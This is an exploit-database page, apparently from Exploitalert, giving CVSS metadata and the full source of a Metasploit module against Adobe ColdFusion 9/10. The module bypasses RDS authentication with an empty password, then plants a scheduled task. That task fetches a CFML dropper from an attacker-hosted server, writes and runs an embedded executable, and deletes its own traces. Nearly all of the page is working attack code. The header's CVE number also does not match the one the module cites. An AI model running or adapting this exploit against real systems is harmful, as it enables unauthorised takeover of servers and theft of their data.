Adobe ColdFusion RDS Authentication Bypass
CVE
Category
Price
Severity
CVE-2013-0629
CWE-287
Not specified
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2019-11-08
CPE
cpe:cpe:/a:adobe:coldfusion
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction None UI The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110045 Adobe ColdFusion RDS Authentication Bypass ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Module::Deprecated
moved_from 'exploit/multi/http/coldfusion_rds'
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion RDS Authentication Bypass',
'Description' => %q{
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote
attackers to bypass authentication using the RDS component. Due to
default settings or misconfiguration, its password can be set to an
empty value. This allows an attacker to create a session via the RDS
login that can be carried over to the admin web interface even though
the passwords might be different, and therefore bypassing authentication
on the admin web interface leading to arbitrary code execution. Tested
on Windows and Linux with ColdFusion 9.
},
'Author' =>
[
'Scott Buckel', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ "CVE", "2013-0632" ],
[ "EDB", "27755" ],
[ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive, #thanks juan!
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2013'
))
register_options(
[
OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
])
register_advanced_options(
[
OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
])
end
def check
uri = target_uri.path
#can we access the admin interface?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
})
if res && res.code == 200 && res.body.include?('ColdFusion Administrator Login')
vprint_good "Administrator access available"
else
return Exploit::CheckCode::Safe
end
#is it cf9?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
})
img = Rex::Text.md5(res.body.to_s)
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
vprint_good "ColdFusion 9 Detected"
else
return Exploit::CheckCode::Safe
end
#can we access the RDS component?
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
if res && res.code == 200 && res.body.include?('true')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@pl = gen_file_dropper
@payload_url = ""
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
end
end
def primer
@payload_url = get_uri
upload_payload
end
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
end
end
def autofilter
true
end
#task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
#instead we use a CFML filedropper to embed our payload and execute it.
#this also removes the dependancy of using the probe.cfm to execute the file.
def gen_file_dropper
rand_var = rand_text_alpha(8+rand(8))
rand_file = rand_text_alpha(8+rand(8))
if datastore['TARGET'] == 0
rand_file += ".exe"
end
encoded_pl = Rex::Text.encode_base64(generate_payload_exe)
print_status "Building CFML shell..."
#embed payload
shell = ""
shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
#if linux set correct permissions
if datastore['TARGET'] == 1
shell += " mode = \"700\""
end
shell += "/>"
#clean up our evil .cfm
shell += " <cffile action=\"delete\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
#execute our payload!
shell += " <cfexecute"
shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
shell += " arguments = \"\""
shell += " timeout = \"60\"/>"
return shell
end
def exec_payload
uri = target_uri.path
print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
print_status("Executing payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
})
end
def upload_payload
uri = target_uri.path
@filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea
print_status "Trying to upload payload via scheduled task..."
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
end
#deal with annoying cookie data prepending (sunglasses)
cookie = res.get_cookies
if res && res.code == 200 && cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
cookie = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
'cookie' => cookie
})
if res && res.code == 200 && res.body.include?('ColdFusion Administrator')
print_good("Logged in as Administrator!")
else
fail_with(Failure::Unknown, "#{peer} - Login Failed")
end
#get file path gogo
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
'vars_get' => {
'name' => "/CFIDE"
},
'cookie' => cookie
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
end
if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
file_path = $1
print_good("File path disclosed! #{file_path}")
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
print_status("Adding scheduled task")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
'vars_post' => {
'TaskName' => taskname,
'Start_Date' => "Nov 1, 2420",
'End_Date' => "",
'Interval' => "",
'ScheduleType' => "Once",
'Operation' => "HTTPRequest",
'ScheduledURL' => @payload_url,
'publish' => "1",
'publish_file' => "#{file_path}\\#{@filename}",
'adminsubmit' => "Submit"
},
'cookie' => cookie
})
unless res && res.code == 200 || res.code == 302 #302s can happen but it still works, http black magic!
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("Running scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'runtask' => taskname,
'timeout' => "0"
},
'cookie' => cookie
})
if res && res.code == 200 && res.body.include?('This scheduled task was completed successfully')
print_good("Scheduled task completed successfully")
else
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("Deleting scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'action' => "delete",
'task' => taskname
},
'cookie' => cookie
})
unless res && res.code == 200
print_error("Scheduled task deletion failed, cleanup might be needed!")
end
end
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum